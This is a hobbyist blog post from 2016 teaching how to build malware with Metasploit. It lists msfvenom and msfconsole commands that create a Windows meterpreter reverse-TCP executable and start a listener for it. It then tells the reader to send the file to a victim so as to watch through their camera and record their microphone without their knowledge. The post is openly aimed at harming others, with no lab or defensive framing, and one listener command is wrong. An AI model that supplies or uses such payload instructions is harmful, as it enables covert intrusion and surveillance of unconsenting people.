We are legion, for we are many.

Sunday, July 10, 2016

How to make a malware.

7:39:00 AM Posted by Unknown No comments
HEYYYYYY GUYSSSSS!!!! WHAT IS UPPPPP!!!!!?????? Today I'm in a very good mood because...because, ohhh I don't know.
So lets get to it today I'll be teaching you how to make a malware using metasploit.
Metasploit actually is a software that is used to make and exploit codes against a remote machine.  We'll be using this to make a malware program that can be used to look through the victims camera and record through his recorder without him knowing it. It can be used in many other ways. But today we'll be sticking to malware creation.
Okay first thing you'll be needing is kali linux for this hack.
before you start, open terminal in kali linux and type in ifconfig then copy your ip address
So let's get down to it:


  1. Open up terminal and type in "msfpayload or msfvenom windows/meterpreter/reverse_tcp LHOST=paste your ip address here LPORT=4444 X>/root/filename.exe"
  2. To verify the exe file go to home and you'll see your file there
  3. Now to set up the listener.
  4. Open up another terminal and type "msfconsole".
  5. Type "use exploit/multi/handler".
  6. "set LHOST your ip address here".
  7. "set LHOST 4444"
  8. "set PAYLOAD windows/meterpreter/reverse_tcp"
  9. "exploit".
And thats it, now all you have to do is to send the file to the victims computer an have them open it. After they do you'll see some codes appear on the screen to look at what you can do now type in help and look at the options available.
That is all for Todays Tutorial. Thank you for visiting and please dont forget to share this blog with your friends and on social media, I'd really like it if you'd all help me in increasing the traffic of this blog because it would be much more fun if more people saw my content. If the traffic of this blog keeps on increasing I'll be uploading some kickass posts so thank you once again and bye bye!!

0 comments:

Post a Comment